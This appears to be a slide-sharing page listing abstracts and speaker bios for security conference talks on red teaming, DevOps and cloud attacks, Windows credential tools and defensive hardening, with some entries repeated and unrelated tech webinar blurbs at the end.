This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.
Red Team Tactics for Cracking the GSuite PerimeterMike Felch
As more corporations adopt Google for providing cloud services they are also inheriting the security risks associated with centralized computing, email and data storage outside the perimeter. In order for pentesters and red teamers to remain effective in analyzing security risks, they must adapt techniques in a way that brings value to the customer.
In this presentation we will begin by demonstrating adaptive techniques to crack the perimeter of Google Suite customers. Next, we will show how evasion can be accomplished by hiding in plain-sight due to failures in incident response plans. Finally, we will also show how a simple compromise could mean collateral damage for customers who are not carefully monitoring these cloud environments.
Talk Venue: BSides Tampa 2020
Speakers: Mike Felch & Joff Thyer
This talk will focus on the many different ways that a penetration tester, or Red Teamer can leverage the Python programming language during offensive operations. Python is a rich and powerful programming language which above all else allows a competent developer to very quickly write new tools that might start as a Proof of Concept, but soon become an invaluable addition to the Red Teamer's tool-belt. Having the skills to both generate new tools, and modify existing tools on the fly is critically important to agility during testing engagement. Everything from utility processing of data, network protocol, API interaction, and exploit development can be rapidly developed due to the high functionality level and intuitive nature of Python.
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
BruCon 2019 Keynote -=> My name is Rob Fuller, I've been around a bit, not as long as some but longer than others. From the US military to government contracting, consulting, large companies, tiny startups and silicon valley behemoths, from podcasting to television, I've had a storied and humbling career in infosec. Let’s get past complaining about blinky lights and users. Let’s talk about what actually works and what doesn't.
Cloud security best practices in AWS by: Ankit GiriOWASP Delhi
Cloud Security:
Some interesting instances of breach
Best practices to protect AWS account from unauthorized access and usage
What and How to look for security loopholes
Audit scripts
What one should learn to safeguard Cloud application?
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates and Ken Johnson will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. This talk will most definitely be an entertaining one but a cautionary tale as well, provoking attendees into action. Ultimately, this is research targeted towards awareness for those operating within a DevOps environment.
Red Team Tactics for Cracking the GSuite PerimeterMike Felch
As more corporations adopt Google for providing cloud services they are also inheriting the security risks associated with centralized computing, email and data storage outside the perimeter. In order for pentesters and red teamers to remain effective in analyzing security risks, they must adapt techniques in a way that brings value to the customer.
In this presentation we will begin by demonstrating adaptive techniques to crack the perimeter of Google Suite customers. Next, we will show how evasion can be accomplished by hiding in plain-sight due to failures in incident response plans. Finally, we will also show how a simple compromise could mean collateral damage for customers who are not carefully monitoring these cloud environments.
Talk Venue: BSides Tampa 2020
Speakers: Mike Felch & Joff Thyer
This talk will focus on the many different ways that a penetration tester, or Red Teamer can leverage the Python programming language during offensive operations. Python is a rich and powerful programming language which above all else allows a competent developer to very quickly write new tools that might start as a Proof of Concept, but soon become an invaluable addition to the Red Teamer's tool-belt. Having the skills to both generate new tools, and modify existing tools on the fly is critically important to agility during testing engagement. Everything from utility processing of data, network protocol, API interaction, and exploit development can be rapidly developed due to the high functionality level and intuitive nature of Python.
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
BruCon 2019 Keynote -=> My name is Rob Fuller, I've been around a bit, not as long as some but longer than others. From the US military to government contracting, consulting, large companies, tiny startups and silicon valley behemoths, from podcasting to television, I've had a storied and humbling career in infosec. Let’s get past complaining about blinky lights and users. Let’s talk about what actually works and what doesn't.
Cloud security best practices in AWS by: Ankit GiriOWASP Delhi
Cloud Security:
Some interesting instances of breach
Best practices to protect AWS account from unauthorized access and usage
What and How to look for security loopholes
Audit scripts
What one should learn to safeguard Cloud application?
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates and Ken Johnson will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. This talk will most definitely be an entertaining one but a cautionary tale as well, provoking attendees into action. Ultimately, this is research targeted towards awareness for those operating within a DevOps environment.
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
On June, thousands of Facebook users complained that they had been infected by a virus through their accounts after they received a message from a Facebook friend claiming they had mentioned them in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO & founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage of the attack started when the user clicked on the “mention”. A malicious file seized control of their browsers, terminating its legitimate session and replacing it with a malicious one that captured their entire web traffic. The second stage included a highly sophisticated script that took over victims Facebook and Google Drive accounts. After puzzling the script, they managed to extract the proverbial needle from a haystack: an unknown Facebook vulnerability that allowed an attacker to exploit the notifications functionality.
In this talk, Dani and Ido will dive into the bites and bytes of the campaign and explaining how the attackers exploited Facebook to spread the malware.
--- Ido Naor
Ido is a senior security researcher at the Global Research & Analysis Team (GReAT), Kaspersky Lab. He joined Kaspersky two years ago and is leading the regional research in Israel.
Ido specializes in malware analysis, penetration testing and software reverse engineering and has been credited for his work by major enterprises such as: Google, Facebook, Linkedin, Alibaba and more.
Aside from research, Ido is a martial arts expert and a father of two daughters.
--- Dani Goland
Dani is the CEO and founder of Undot, an Israeli-based startup that developed a unified remote-control application to control home appliances.
Dani has more than a decade of experience in programming on a variety of frameworks and languages.
Aside from managing Undot, Dani is a frequent competitor in Hackathons (programming competitions) and won 1st places at HackTrackTLV 2016 and eBay Hackathon 2015.
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamOWASP Delhi
This slide is all about Google bug hunting.
How you should report the bug?
What things you should consider while reporting?
Life cycle of your Vulnerability report submission
Automating Attacks Against Office365 - BsidesPDX 2016Karl Fosaaen
The move to Office365 has become increasingly popular in the last few years. As a penetration tester, I'm seeing more organizations shuttle their domain credentials up to the cloud for easier management of their Office365 environment. By federating with Microsoft, many organizations are exposing a larger attack surface area to the internet. During this talk, I will show you how to identify domains that are Microsoft managed, help you guess passwords for users on those domains, and show you how to pivot from the cloud environment into a company's internal network. Since manually completing attacks against these endpoints can be tedious, I've created some PowerShell tools to help automate these attacks. We'll go over how to use these tools from an external penetration test perspective and show how Office365 in the cloud can be a great target for attackers.
Denis Zhuchinski Ways of enhancing application securityАліна Шепшелей
In this lecture we will talk about what you should know and consider in the construction of an application developer to ensure the safe use of confidential user data.
This talk shows the possibilities of reversing Android applications. After an introduction about Android issues in the past, Tobias Ospelt explains how he managed to download several thousand Android applications from the Google Market, and which security issues are present in various apps. Apps can be decompiled, altered and recompiled, which means that for most apps it is very easy to steal code or to include malware. Some of the apps use obfuscation to disguise the code, but for example encryption keys can easily be extracted. Small game developers, as well as big companies are not aware of the risk that their code can be decompiled to java and disassembled to smali code. This is how a lot of protection mechanisms can be circumvented, such as licensing (cracking a Game) or corporate solutions (enforcing policies on the mobile). The talk shows how easy everybody can reverse android apps and how encryption keys can be extracted, even when the code is obfuscated. The material is a nice follow-up to the Android talk of Jesse Burns from last year at #days, although this talk is more focused on the apps and shows some more hacks/code/encryption/obfuscation/reversing.
Bio: Tobias Ospelt is working as a security expert and tester for Dreamlab Technologies AG in Bern. He is mainly involved in web application and mobile security penetration tests. Tobias Ospelt joined Dreamlab after having achieved his Master Degree focusing IT-Security, and after having worked as a Research Assistant at the Zurich University of Applied Sciences.
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...Benjamin Delpy
This talk will focus on the how Windows authentication works in the real world and what are the popular attacks against it. You will learn the thought process of attackers in the real world and how it differs from a defender’s perspective. We’ll also cover post-exploitation tools and techniques such as Mimikatz. Finally, we’ll discuss next steps – How do you design services that are breach-resistant and make authentication harder to crack.
OWASP SF - Reviewing Modern JavaScript ApplicationsLewis Ardern
When dealing with modern JavaScript applications, many penetration testers approach from an ‘out-side-in’ perspective, this is approach often misses security issues in plain sight. This talk will attempt to demystify common JavaScript issues which should be better understood/identified during security reviews. We will discuss reviewing applications in code-centric manner by using freely available tools to help start identifying security issues through processes such as linting and dependency auditing.
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
The presentation focuses on the whole process of security testing and present it by analogies to the web applications which are quite well-known. It covers the whole SDLC and show the similarities and differences in the arsenal of vulnerabilities, security tools and standards between the smart contracts and web applications on each step. Even though there exist a lot of great security projects for smart contracts, we do not have single, widely accepted security standard (such as ASVS in web apps world). That is why we introduce SCSVS (Smart Contract Security Verification Standard), a open-source 13-part checklist created to standardize the security of smart contracts for developers, architects, security reviewers and vendors.
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
-AWS Hardening
-AWS Monitoring
-AWS Disaster Recovery
-GitHub Monitoring
-OPINT
-Software Development Practices/Processes
-Secure use of Jenkins/Hudson
-Developer laptop hardening (OS X)
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
On June, thousands of Facebook users complained that they had been infected by a virus through their accounts after they received a message from a Facebook friend claiming they had mentioned them in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO & founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage of the attack started when the user clicked on the “mention”. A malicious file seized control of their browsers, terminating its legitimate session and replacing it with a malicious one that captured their entire web traffic. The second stage included a highly sophisticated script that took over victims Facebook and Google Drive accounts. After puzzling the script, they managed to extract the proverbial needle from a haystack: an unknown Facebook vulnerability that allowed an attacker to exploit the notifications functionality.
In this talk, Dani and Ido will dive into the bites and bytes of the campaign and explaining how the attackers exploited Facebook to spread the malware.
--- Ido Naor
Ido is a senior security researcher at the Global Research & Analysis Team (GReAT), Kaspersky Lab. He joined Kaspersky two years ago and is leading the regional research in Israel.
Ido specializes in malware analysis, penetration testing and software reverse engineering and has been credited for his work by major enterprises such as: Google, Facebook, Linkedin, Alibaba and more.
Aside from research, Ido is a martial arts expert and a father of two daughters.
--- Dani Goland
Dani is the CEO and founder of Undot, an Israeli-based startup that developed a unified remote-control application to control home appliances.
Dani has more than a decade of experience in programming on a variety of frameworks and languages.
Aside from managing Undot, Dani is a frequent competitor in Hackathons (programming competitions) and won 1st places at HackTrackTLV 2016 and eBay Hackathon 2015.
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamOWASP Delhi
This slide is all about Google bug hunting.
How you should report the bug?
What things you should consider while reporting?
Life cycle of your Vulnerability report submission
Automating Attacks Against Office365 - BsidesPDX 2016Karl Fosaaen
The move to Office365 has become increasingly popular in the last few years. As a penetration tester, I'm seeing more organizations shuttle their domain credentials up to the cloud for easier management of their Office365 environment. By federating with Microsoft, many organizations are exposing a larger attack surface area to the internet. During this talk, I will show you how to identify domains that are Microsoft managed, help you guess passwords for users on those domains, and show you how to pivot from the cloud environment into a company's internal network. Since manually completing attacks against these endpoints can be tedious, I've created some PowerShell tools to help automate these attacks. We'll go over how to use these tools from an external penetration test perspective and show how Office365 in the cloud can be a great target for attackers.
Denis Zhuchinski Ways of enhancing application securityАліна Шепшелей
In this lecture we will talk about what you should know and consider in the construction of an application developer to ensure the safe use of confidential user data.
This talk shows the possibilities of reversing Android applications. After an introduction about Android issues in the past, Tobias Ospelt explains how he managed to download several thousand Android applications from the Google Market, and which security issues are present in various apps. Apps can be decompiled, altered and recompiled, which means that for most apps it is very easy to steal code or to include malware. Some of the apps use obfuscation to disguise the code, but for example encryption keys can easily be extracted. Small game developers, as well as big companies are not aware of the risk that their code can be decompiled to java and disassembled to smali code. This is how a lot of protection mechanisms can be circumvented, such as licensing (cracking a Game) or corporate solutions (enforcing policies on the mobile). The talk shows how easy everybody can reverse android apps and how encryption keys can be extracted, even when the code is obfuscated. The material is a nice follow-up to the Android talk of Jesse Burns from last year at #days, although this talk is more focused on the apps and shows some more hacks/code/encryption/obfuscation/reversing.
Bio: Tobias Ospelt is working as a security expert and tester for Dreamlab Technologies AG in Bern. He is mainly involved in web application and mobile security penetration tests. Tobias Ospelt joined Dreamlab after having achieved his Master Degree focusing IT-Security, and after having worked as a Research Assistant at the Zurich University of Applied Sciences.
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...Benjamin Delpy
This talk will focus on the how Windows authentication works in the real world and what are the popular attacks against it. You will learn the thought process of attackers in the real world and how it differs from a defender’s perspective. We’ll also cover post-exploitation tools and techniques such as Mimikatz. Finally, we’ll discuss next steps – How do you design services that are breach-resistant and make authentication harder to crack.
OWASP SF - Reviewing Modern JavaScript ApplicationsLewis Ardern
When dealing with modern JavaScript applications, many penetration testers approach from an ‘out-side-in’ perspective, this is approach often misses security issues in plain sight. This talk will attempt to demystify common JavaScript issues which should be better understood/identified during security reviews. We will discuss reviewing applications in code-centric manner by using freely available tools to help start identifying security issues through processes such as linting and dependency auditing.
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
The presentation focuses on the whole process of security testing and present it by analogies to the web applications which are quite well-known. It covers the whole SDLC and show the similarities and differences in the arsenal of vulnerabilities, security tools and standards between the smart contracts and web applications on each step. Even though there exist a lot of great security projects for smart contracts, we do not have single, widely accepted security standard (such as ASVS in web apps world). That is why we introduce SCSVS (Smart Contract Security Verification Standard), a open-source 13-part checklist created to standardize the security of smart contracts for developers, architects, security reviewers and vendors.
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
-AWS Hardening
-AWS Monitoring
-AWS Disaster Recovery
-GitHub Monitoring
-OPINT
-Software Development Practices/Processes
-Secure use of Jenkins/Hudson
-Developer laptop hardening (OS X)
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Chris Gates
In a rare mash-up, DevOps is increasingly blending the work of both application and network security professionals. In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates (carnal0wnage) and Ken Johnson (cktricky) will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. Everything from common misconfigurations to remote code execution will be presented. This is research to bring awareness to those responsible for securing a DevOps environment.
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
A little over a year ago I made the transition from external security consultant to internal offensive security engineer at Facebook. I went from a full time breaker to part time fixer. This talk is aimed at providing lessons learned and documenting the mindset changes I've made over the last year that I feel can be used by the industry as a whole. I've broken the lessons learned into three primary buckets; Red, Blue, and Purple and the talk will hopefully bring value to anyone working in their respective bucket or assist in their creation/continuing of purple teaming at their company.
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Chris Gates
Brucon 2016
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable process. It is extremely rare that a vulnerability causes a direct risk to an environment, it is usually what the attacker DOES with the access gained that matters. In this talk we will discuss the way that Internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the Defensive teams to measure the environments resistance to the attacks. We will demonstrate attacks, capabilities, TTP’s tracking, trending, positive metrics, hunt integration and most of all we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team. Sparring and training every day to be ready for the fight when it comes to us.
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
Sector 2016 Chris Gates & Haydn Johnson
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
In a rare mash-up, DevOps is increasingly blending the work of both application and network security professionals. In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates (carnal0wnage) and Ken Johnson (cktricky) will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. Everything from common misconfigurations to remote code execution will be presented. This is research to bring awareness to those responsible for securing a DevOps environment.
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
DevOps toolchains are transforming modern IT, but hackers can undermine their benefits through poorly implemented or vulnerable DevOps tools. Chris Gates and Ken Johnson will share their collaborative attack research into the technology driving DevOps. They will share an attacker's perspective on exploiting DevOps organizations and the countermeasures these organizations should employ.
RSAC 2017
Ken Johnson & Chris Gates
Cecyf / Coriin - mimikatz et la mémoire de WindowsBenjamin Delpy
mimikatz et la mémoire de Windows, présenté à Lille pour Coriin dans le cadre du Cecyf
Les différents moyens d'utiliser la mémoire des processus sous Windows, pour :
obtenir des clés, des mots de passe, code pin, ticket kerberos
mais aussi manipuler la gestion des authentifications, des comptes utilisateurs dans l'AD, etc.
mimikatz @ sthack
http://blog.gentilkiwi.com/mimikatz
Une petite présentation pour aborder de nouvelles méthodes de récupération de credentials sous Windows, y compris les versions 8.1/2012r2.
Démonstration des modules kerberos et sekurlsa.
Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with attendees over 200. Meet m e at FB if u want it fb/nipun.jaswal
Abusing bleeding edge web standards for appsec gloryPriyanka Aash
"Through cooperation between browser vendors and standards bodies in the recent past, numerous standards have been created to enforce stronger client-side control for web applications. As web appsec practitioners continue to shift from mitigating vulnerabilities to implementing proactive controls, each new standard adds another layer of defense for attack patterns previously accepted as risks. With the most basic controls complete, attention is shifting toward mitigating more complex threats. As a result of the drive to control for these threats client-side, standards such as SubResource Integrity (SRI), Content Security Policy (CSP), and HTTP Public Key Pinning (HPKP) carry larger implementation risks than others such as HTTP Strict Transport Security (HSTS). Builders supporting legacy applications actively make trade-offs between implementing the latest standards versus accepting risks simply because of the increased risks newer web standards pose.
In this talk, we'll strictly explore the risks posed by SRI, CSP, and HPKP; demonstrate effective mitigation strategies and compromises which may make these standards more accessible to builders and defenders supporting legacy applications; as well as examine emergent properties of standards such as HPKP to cover previously unforeseen scenarios. As a bonus for the breakers, we'll explore and demonstrate exploitations of the emergent risks in these more volatile standards, to include multiple vulnerabilities uncovered quite literally during our research for this talk (which will hopefully be mitigated by d-day)."
(Source: Black Hat USA 2016, Las Vegas)
Externally Testing Modern AD Domains - ArcticconKarl Fosaaen
Externally federated domain endpoints are an exciting target for Red Team assessments. While often overlooked, externally federated domain services can provide multiple access points to an internal network, from the internet. This talk will cover enumeration of federated domains (ADFS and AzureAD), the enumeration of federated services (Office365, Skype for Business, etc.), and attacks that you can leverage against these endpoints to gain access to an internal network. Additional PowerShell tools will be included in the talk to help you automate these attacks.
Security is more critical than ever with new computing environments in the cloud and expanding access to the internet. There are a number of security protection mechanisms available for MongoDB to ensure you have a stable and secure architecture for your deployment. Dave Erickson will walk through general security threats to databases and specifically how they can be mitigated for MongoDB deployments. Rob Moore will then go into depth on the specific topic of setting up and running MongoDB with TLS/SSL and x.509 authentication covering how it works and common errors he's encountered in the field.
This is my presentation from Denver Startup Week 2016 on security for applications and servers. This presentation covers everything you need to know about securing a Linux server and your application.
Practical security - access control, least privilege, cryptography at work, security attacks and pen testing your system with MetaSploit. The enemy knows the system. Not security by obscurity
Your data is much safer at home than it is letting some corporation "take care of it" for you, right? Security reviews for some of the top vendors' devices reveal many interesting findings. Like everything else, there are bugs. But knowing what kinds of bugs and how the vendors have responded will allow you to better understand the impact of plugging these devices into your network. Jeremy will show you just how low access control and least privilege are their list of priorities. He'll also explore the amount of test collateral and debug interfaces sloppily left shipping to consumers. From remote roots to stealing social network tokens to just plain weird stuff, he'll expand on how it's not just about what they do, but also what they don't do. And, he'll give you some useful guidelines on how to close the gaps yourself.
Intro slides for a tutorial on hacking common vulnerabilities and how to prevent those problems in your own code. This is a PHP based tutorial that's hands on, but the slides can help as reference material for a few common hacks
Socially Acceptable Methods to Walk in the Front DoorMike Felch
With initial access vectors getting scarce and the threat landscape evolving at a rapid pace, red teams are beginning to reconsider their angle of pursuit. This has caused old means of entry to be revisited in new ways while also paving the way for new entry techniques for emerging technologies. We will introduce novel approaches to gaining remote read and write access to a users Microsoft Windows file system for exfiltrating sensitive files and planting droppers. Additionally, we will share some unique research on Microsoft Azure tokens and compromising access with minimal effort leading to cloud pivoting opportunities. Attendees can expect to learn about some new red team tradecraft for traditional technologies, innovative tradecraft for emerging cloud environments, and a handful of offsec tools designed to regain traction with initial access.
This talk was given live at WWHF 2021.
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureMongoDB
Your MongoDB Community Edition database can probably be a lot more secure than it is today, since Community Edition provides a wide range of capabilities for securing your system, and you are probably not using them all. If you are worried about cyber-threats, take action reduce your anxiety!
Contrary to most presentations and blog posts there is more to AWS than S3. In a quest to create more re-usable code we have created WeirdAAL (AWS Attack Library). Offensively, WeirdAAL helps you answer the “what can I do with this AWS key”? We aim to answer that question, in a blackbox way, via recon modules and modules specifically dedicated to attack each of the interesting AWS service offerings while avoiding detection. It also provides multiple functions sorted by AWS service that you can use for both offensive and defensive checks.
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Chris Gates
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable process. It is extremely rare that a vulnerability causes a direct risk to an environment, it is usually what the attacker DOES with the access gained that matters. In this talk, we will discuss the way that Internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the Defensive teams to measure the environments resistance to the attacks. We will demonstrate attacks, capabilities, TTP’s tracking, trending, positive metrics, hunt integration and most of all we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team. Sparring and training every day to be ready for the fight when it comes to us. This is an update to our 2016 Brucon talk. We plan to discuss what have we accomplished regarding the above in the last year. We plan to show how we have progressed with the automation of attacker activities and event generation using MITRE’s Cyber Analytics Repository & CAR Exploration Tool (CARET) along with pumping these results to Unfetter (https://iadgov.github.io/unfetter/) for aggregation and display in a useful format.
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
Derbycon 2011
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsChris Gates
This presentation focuses on pentesting high security environments, new ways of identifying/bypassing common security mechanisms, owning the domain, staying persistent, and ex-filtrating critical data from the network without being detected. The term Advanced Persistent Threat (APT) has caused quite a stir in the IT Security field, but few pentesters actually utilize APT techniques and tactics in their pentests.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
